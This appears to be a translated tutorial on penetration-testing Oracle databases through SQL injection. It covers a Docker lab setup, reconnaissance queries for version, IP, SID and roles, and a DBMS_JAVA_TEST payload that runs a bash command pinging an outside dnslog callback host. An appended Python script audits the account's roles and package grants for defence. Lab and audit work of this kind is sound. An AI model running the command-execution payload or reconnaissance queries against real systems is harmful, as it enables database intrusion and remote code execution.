• Penetration testing of Oracle databases
    • Building the Oracle injection lab
      • ✅ Setting up the Oracle database service
      • ✅ Web database connection test
      • ✅ Starting the SQL injection lab
    • Database penetration testing against Oracle
      • ✅ Common Oracle database pentest statements
      • ❎ Simple pentest example

Reference: Oracle error-based manual injection

Building the Oracle database injection lab

Starting the Oracle service

Docker is used to run the Oracle database for the penetration test; the environment is as follows:

Start Oracle with Docker

# DBA connection
  • Command overview
# pull the Oracle database image
docker pull registry.cn-hangzhou.aliyuncs.com/qida/oracle-xe-11g
# run the image in the background as a container named oracle and map the container's port 1521 to local port 1521
docker run -d -p 1521:1521 --name oracle registry.cn-hangzhou.aliyuncs.com/qida/oracle-xe-11g
# open an interactive shell in the oracle container
docker exec -it oracle bash

sqlplus /nolog
SQL> conn sys/oracle as sysdba
Connected.

SQL> select name from v$database;

NAME
---------
XE

  • Create a user and grant privileges

Web database connection

SQL> create tablespace pentest datafile '/tmp/pentest.dbf' size 100m;

Tablespace created.

SQL> create user pentest identified by pentest default tablespace pentest;

User created.

SQL> grant connect,resource,dba to pentest;

Grant succeeded.

SQL> exit
Disconnected from Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
root@bd849e50bab4:/# sqlplus pentest/pentest

SQL*Plus: Release 11.2.0.2.0 Production on Fri Feb 19 06:38:04 2021

Copyright (c) 1982, 2011, Oracle.  All rights reserved.


Connected to:
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production

SQL> CREATE TABLE users (id number,name varchar(500),surname varchar(1000));

Table created.

SQL> INSERT INTO users (id, name, surname) VALUES (1, 'luther', 'blisset');
INSERT INTO users (id, name, surname) VALUES (2, 'fluffy', 'bunny');
INSERT INTO users (id, name, surname) VALUES (3, 'wu', 'ming');
INSERT INTO users (id, name, surname) VALUES (4, 'sqlmap/1.0-dev (http://sqlmap.org)', 'user agent header');
INSERT INTO users (id, name, surname) VALUES (5, NULL, 'nameisnull');
commit;
1 row created.

SQL> 
1 row created.

SQL> 
1 row created.

SQL> 
1 row created.

SQL> 
1 row created.

SQL> commit;

Commit complete.

SQL> SELECT * FROM users where id=1;

	ID
----------
NAME
--------------------------------------------------------------------------------
SURNAME
--------------------------------------------------------------------------------
	 1
luther
blisset

Common pentest statements:

1 Current user's privileges
select * from session_roles
2 Current database version
select banner from sys.v_$version where rownum=1
3 Server's outbound IP
can be obtained with utl_http.request
4 Server's listening IP
select utl_inaddr.get_host_address from dual
5 Server operating system
select member from v$logfile where rownum=1
6 Server SID, needed for remote connections
select instance_name from v$instance;
7 Currently connected user
select SYS_CONTEXT ('USERENV', 'CURRENT_USER') from dual

Version:

select * from v$version;

Oracle Database 11g Enterprise Edition Release 11.2.0.4.0 - 64bit Production
PL/SQL Release 11.2.0.4.0 - Production
CORE	11.2.0.4.0	Production
TNS for Linux: Version 11.2.0.4.0 - Production
NLSRTL Version 11.2.0.4.0 - Production

oracleShell.jar environment

Oracle Database 11g Enterprise Edition Release 11.2.0.1.0 - Production
PL/SQL Release 11.2.0.1.0 - Production
"CORE	11.2.0.1.0	Production"
TNS for 32-bit Windows: Version 11.2.0.1.0 - Production
NLSRTL Version 11.2.0.1.0 - Production

select utl_inaddr.get_host_address from dual

172.17.0.2

Patches:

select * from dba_registry_history;


2018-04-25 12:22:17.105985	APPLY	SERVER	11.2.0.4	0	PSU	Patchset 11.2.0.2.0

Privileges:

select * from session_roles;

CONNECT
RESOURCE
DBA
SELECT_CATALOG_ROLE
HS_ADMIN_SELECT_ROLE
EXECUTE_CATALOG_ROLE
HS_ADMIN_EXECUTE_ROLE
DELETE_CATALOG_ROLE
EXP_FULL_DATABASE
IMP_FULL_DATABASE
DATAPUMP_EXP_FULL_DATABASE
DATAPUMP_IMP_FULL_DATABASE
GATHER_SYSTEM_STATISTICS
SCHEDULER_ADMIN
WM_ADMIN_ROLE
Select DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','/bin/bash','-c','ping ojuht0.dnslog.cn') from dual;
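The lab account above was granted CONNECT, RESOURCE and DBA, which is why the session_roles listing is so long and why UTL_HTTP, UTL_INADDR and DBMS_JAVA are reachable from an injection point. The following script is an added example, not code from the original post: it runs the page's fingerprinting statements against the lab (assuming python-oracledb is installed and the page's pentest/pentest credentials on localhost:1521/XE) and flags roles and package grants that a web application account should not hold; the package check via ALL_TAB_PRIVS is my addition.

```python
import sys

# Fingerprinting statements taken from the page
FINGERPRINT_QUERIES = {
    "version":  "select banner from sys.v_$version where rownum=1",
    "instance": "select instance_name from v$instance",
    "host_ip":  "select utl_inaddr.get_host_address from dual",
    "user":     "select sys_context('USERENV', 'CURRENT_USER') from dual",
}
ROLES_QUERY = "select role from session_roles"
# EXECUTE grants (direct or via PUBLIC) on the packages the page uses for
# reconnaissance and OS command execution
PACKAGE_QUERY = ("select table_name from all_tab_privs "
                 "where privilege = 'EXECUTE' and table_name in "
                 "('UTL_HTTP', 'UTL_INADDR', 'DBMS_JAVA', 'DBMS_JAVA_TEST')")
# Roles from the page's session_roles output that an app account never needs
RISKY_ROLES = {"DBA", "EXP_FULL_DATABASE", "IMP_FULL_DATABASE",
               "DATAPUMP_EXP_FULL_DATABASE", "DATAPUMP_IMP_FULL_DATABASE",
               "SCHEDULER_ADMIN"}

def audit(roles, exec_packages):
    """Return findings as strings; an empty list means least privilege looks ok."""
    findings = []
    for role in sorted({r.upper() for r in roles} & RISKY_ROLES):
        findings.append(f"role {role} granted: revoke it from the web account")
    for pkg in sorted({p.upper() for p in exec_packages}):
        findings.append(f"EXECUTE on {pkg}: allows network/OS reach from SQL injection")
    return findings

def run_live(user="pentest", password="pentest", dsn="localhost:1521/XE"):
    import oracledb  # pip install oracledb; imported lazily so audit() works offline
    with oracledb.connect(user=user, password=password, dsn=dsn) as conn:
        cur = conn.cursor()
        for label, sql in FINGERPRINT_QUERIES.items():
            cur.execute(sql)
            print(f"{label:9s} {cur.fetchone()[0]}")
        cur.execute(ROLES_QUERY)
        roles = [row[0] for row in cur.fetchall()]
        cur.execute(PACKAGE_QUERY)
        pkgs = [row[0] for row in cur.fetchall()]
    return audit(roles, pkgs)

if __name__ == "__main__":
    for finding in run_live(*sys.argv[1:]):
        print("FINDING:", finding)
```

With the DBA role present, the package findings are secondary: DBA already carries EXECUTE ANY PROCEDURE, so revoking DBA and granting only CONNECT plus the table privileges the application needs is the fix that matters.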